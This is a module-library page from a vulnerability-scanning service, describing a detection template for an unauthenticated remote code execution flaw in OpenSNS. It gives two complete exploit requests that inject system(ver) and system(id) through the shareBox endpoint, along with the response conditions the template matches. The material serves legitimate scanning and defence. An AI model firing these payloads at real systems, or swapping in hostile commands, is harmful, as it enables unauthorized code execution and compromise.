Module library
Ethical Hacking Automation
Automate Recon and scanning process with Vidoc. All security teams in one place
OpenSNS - Remote Code Execution
By kannthu
Vidoc ModuleDescription
What is "OpenSNS - Remote Code Execution?"
The "OpenSNS - Remote Code Execution" module is a test case designed to detect a critical vulnerability in the OpenSNS software. OpenSNS is a social networking platform that allows users to create and manage their own social networks. This module focuses on the "shareBox" endpoint, which is vulnerable to remote unauthenticated code execution.
The severity of this vulnerability is classified as critical, with a CVSS score of 10. This means that it poses a significant risk to the security and integrity of the OpenSNS application.
This module was authored by gy741.
Impact
If successfully exploited, this vulnerability allows remote attackers to execute arbitrary code on the targeted OpenSNS application. This can lead to unauthorized access, data breaches, and potential compromise of the entire system.
How the module works?
The "OpenSNS - Remote Code Execution" module works by sending HTTP requests to the vulnerable "shareBox" endpoint. The module includes two request templates:
GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
These requests exploit the vulnerability by injecting arbitrary commands into the "cmd" parameter. The module then applies matching conditions to determine if the vulnerability is present:
- The response body must contain either "uid=" or "gid=" and "Microsoft Windows" in order to match the first condition. - The response must contain the word "/Application/" in any part of the response to match the second condition. - The response status code must be 200 to match the third condition.If all the matching conditions are met, the module reports the vulnerability.